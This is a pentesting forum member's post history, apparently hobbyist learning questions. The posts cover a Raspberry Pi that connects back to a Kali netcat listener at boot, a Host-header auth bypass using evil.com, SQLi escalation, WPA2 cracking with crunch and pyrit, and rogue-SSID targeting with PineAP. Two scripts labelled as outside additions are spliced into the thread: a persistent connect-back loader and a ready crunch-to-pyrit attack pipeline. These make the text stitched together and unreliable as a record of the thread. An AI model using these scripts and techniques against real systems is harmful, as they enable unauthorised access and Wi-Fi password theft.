bolus

Active Members
Posts: 55
1,642 profile views
  1. @i8igmac - you've cracked it! Added the sleep command and it's working a treat now. Thank you for your assistance and suggestions, really appreciate it.
  2. Thanks for the quick suggestion @i8igmac - appreciate it. Unfortunately, that's not worked. I've edited /etc/rc.local and added:

         netcat 192.168.1.215 443 -w 10

     On reboot - nothing. If I run the command stand-alone, it connects fine, so I've ruled out a connectivity issue there. Could it be anything to do with the user that the Pi boots with? I've tried adding sudo in front of the netcat command - nothing. Any suggestions from you guys are appreciated.
  3. I'm trying a proof of concept whereby when my Pi starts, it kicks off a Netcat session with my Kali laptop.

     Setup:
     Kali laptop (192.168.1.215): netcat -lvp 443
     Pi (192.168.1.217): I have the script boot_netcat.sh (and ran chmod +x on it):

         #!/bin/bash
         netcat 192.168.1.215 443 -w 10

     In crontab I have added:

         @reboot /home/pi/scripts/boot_netcat.sh

     When I reboot the Pi, the script isn't run. I've tried adding sudo to the script and also to the crontab entry - still no joy. I've also tried this by ensuring cron is run at boot via /etc/rc.local:

         /etc/init.d/cron start

     And still nothing. If I run ps aux | grep cron I can see cron running. If I run the script on its own, it executes and connects to my Kali laptop netcat listener. I'm sure it's something very simple that I'm not doing or not seeing - any suggestions as to what the problem is, or is there a better way to do this? Thanks in advance.
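A boot-time connect-back script that polls for the listener instead of relying on a fixed sleep, added here as an example; it is not the poster's script and is not from the thread. The addresses, the retry budget (30 attempts, 2 s apart), the log path and the use of timeout(1) with bash's /dev/tcp as the reachability probe are assumptions.

```shell
#!/bin/bash
# Added example (not the original poster's script): connect back to a netcat
# listener once the network is actually up, instead of sleeping a fixed time.
# Meant for a crontab line such as (log path is an assumption):
#   @reboot /home/pi/scripts/boot_netcat.sh 192.168.1.215 443 >>/home/pi/scripts/boot_netcat.log 2>&1

# cron starts jobs with a minimal PATH; make tool lookups explicit.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

RETRY_DELAY="${RETRY_DELAY:-2}"   # seconds between connection attempts

# Default probe: open a TCP connection with bash's /dev/tcp, bounded by timeout(1).
# Returns 0 when HOST:PORT accepts the connection, non-zero otherwise.
probe_tcp() {
  timeout 3 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Poll until the listener answers or the attempt budget is spent.
#   $1 host, $2 port, $3 max attempts, $4 probe function (defaults to probe_tcp)
# Returns 0 on success, 1 when every attempt failed.
wait_for_listener() {
  local host=$1 port=$2 tries=$3 probe=${4:-probe_tcp} i=1
  while [ "$i" -le "$tries" ]; do
    if "$probe" "$host" "$port"; then
      echo "$(date '+%F %T') listener $host:$port reachable after $i attempt(s)"
      return 0
    fi
    if [ "$i" -lt "$tries" ]; then
      sleep "$RETRY_DELAY"
    fi
    i=$((i + 1))
  done
  echo "$(date '+%F %T') listener $host:$port not reachable after $tries attempts" >&2
  return 1
}

main() {
  local host=$1 port=$2
  # 30 attempts * 2 s is roughly a minute for DHCP/Wi-Fi to settle on a Pi (assumed budget).
  wait_for_listener "$host" "$port" 30 || exit 1
  # Same command the thread uses; -w 10 is netcat's connect/idle timeout.
  exec netcat "$host" "$port" -w 10
}

# Only act when invoked with HOST PORT (as from crontab); otherwise just define functions.
if [ "$#" -ge 2 ]; then
  main "$1" "$2"
fi
```

Because the probe function is a parameter, the retry logic can be exercised without a network; at boot the default probe is used, and the timestamped log lines show how long the interface took to come up, which is the first thing to check when an @reboot job "does nothing".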
  4. Thanks @digininja, appreciate the quick response. Confirms one of my theories.
  5. I've got a page where the content access is restricted by a username/password combination. It's not credentials the user has to register for; it's just set on the server, where all content is publicly accessible apart from this page. I've found that I can access this by changing the header host value (via Burp).

     Original:

         GET /content HTTP/1.1
         host: site.com

     which returns HTTP 401 Authorization Required. I change the header details to:

         GET /content HTTP/1.1
         host: evil.com

     and then I can access the requested page. I kinda stumbled across this, and would like to learn more about it - any advice as to what this type of vulnerability is called, and why it happens? I *think* that it's happening due to the validation only working when the request comes from the host domain, but would like confirmation of this. Cheers
  6. Any tools you can recommend for looking at a website/application to deduce the software and versions that have been used? I don't mean like an nmap scan to identify services, but the software and services that are used when you're browsing the site. Thinking along the lines of builtwith.com, and something that goes a little deeper. Thanks in advance
  7. Thanks both for your feedback, very interesting and useful
  8. When you're running the OSINT and passive part of your engagement, what's the typical order of tools that you tend to run through?

     Dig, Fierce, DNS Recon
     Google hacks, Shodan, netcraft, built with
     Harvester
     Recon-ng, OSINT Framework
     Nikto
     Skipfish
     HTTrack, Burpsuite
     etc. etc.

     How do you structure your part of a pen test?
  9. You need to get even closer.
  10. I've not watched this yet; what did they mess up? Was it intentional so that viewers have to find out for themselves, or was it an oversight?
  11. I'm learning my way through SQLi, and wondered what typically the next steps are after I've:

      1. Identified a vulnerability
      2. Via SQLi, listed DB, user, tables, columns, content of columns etc.
      3. Identified that the user is not sysadmin (on a MySQL system)

      Where does one typically go next with identifying further information, and ultimately escalating privileges? I'm not after a step-by-step hold-my-hand approach, more a general "this is the order I tend to do things in", as I know everyone has a different approach. Thanks in advance
  12. Probably one of these: https://aws.amazon.com/ec2/instance-types/ (scroll down for GPU G2). TBH I've only just started looking into this, and I was fortunate enough to receive a $50 AWS voucher, so thought I'd have a play around with GPU pyrit.

      Model       GPUs  vCPU  Mem (GiB)  SSD Storage (GB)
      g2.2xlarge  1     8     15         1 x 60
      g2.8xlarge  4     32    60         2 x 120
  13. Sorry, I worded my question rather vaguely. I don't have a lot at home in terms of processing power, so am thinking that an AWS GPU solution might be the way to go. Thanks for your quick response
  14. Hi all. I've got a WPA2 handshake to crack; I know the format is 8 characters, upper case A-Z and 0-9. I was thinking of using an AWS GPU instance to pipe Crunch output into Pyrit GPU, as I don't have masses of storage space to save the output. Does this sound like a feasible option, or can you think of a better way? Cheers
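The sizing a practitioner would do before renting GPU time for the 8-character [A-Z0-9] job described above, plus the crunch-to-pyrit pipeline that avoids writing the wordlist to disk. This is an added example, not the poster's commands; the capture file name, the BSSID and the 100,000 PMK/s rate used for the time estimate are placeholders (measure the real rate with pyrit benchmark on the instance).

```shell
#!/bin/bash
# Added example (not from the original post): size the 8-char [A-Z0-9] keyspace
# before renting GPU time, then feed crunch straight into pyrit so nothing is
# written to disk. Capture path, BSSID and the PMK/s rate are assumptions.

CHARSET='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'   # 36 symbols, as described in the post
LENGTH=8

# Number of candidates for a fixed-length, fixed-charset brute force: |charset|^length.
keyspace() {
  local size=$1 length=$2 total=1 i=0
  while [ "$i" -lt "$length" ]; do
    total=$((total * size))
    i=$((i + 1))
  done
  echo "$total"
}

# Bytes a plain wordlist of that keyspace would take on disk (each line: length + newline).
wordlist_bytes() {
  echo "$(( $1 * ($2 + 1) ))"
}

# Whole days needed to exhaust a keyspace at a given PMK/s rate.
eta_days() {
  echo "$(( $1 / $2 / 86400 ))"
}

# crunch -> pyrit pipeline; "-i -" makes pyrit read candidates from stdin.
# Run by hand, e.g.: run_attack handshake.cap 00:11:22:33:44:55   (both placeholders)
run_attack() {
  local capture=$1 bssid=$2
  crunch "$LENGTH" "$LENGTH" "$CHARSET" | pyrit -r "$capture" -b "$bssid" -i - attack_passthrough
}

report() {
  local n bytes
  n=$(keyspace ${#CHARSET} "$LENGTH")
  bytes=$(wordlist_bytes "$n" "$LENGTH")
  echo "keyspace:         $n candidates"
  echo "wordlist on disk: $bytes bytes (~$((bytes / 1000000000000)) TB), which is why piping beats saving"
  echo "at 100000 PMK/s:  $(eta_days "$n" 100000) days (placeholder rate; measure with: pyrit benchmark)"
}
report
```

The numbers are the point: 36^8 is about 2.8 trillion candidates, a saved wordlist would be roughly 25 TB, and at a placeholder 100,000 PMK/s the full keyspace takes the better part of a year, so the real benchmark figure decides whether a G2 instance is viable or the space needs narrowing.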
  15. If you've got time to prepare whilst other presentations are on, why not run a recon as close to the clients as you can get, and try to identify their devices. Then you can log probes that their devices are making, and set up PineAP with some of their SSIDs, and omit any other probes - that way you keep it targeted to the client and show them that they can be singled out pretty easily. Might be worth finding out if there are any legal issues with this before you embark.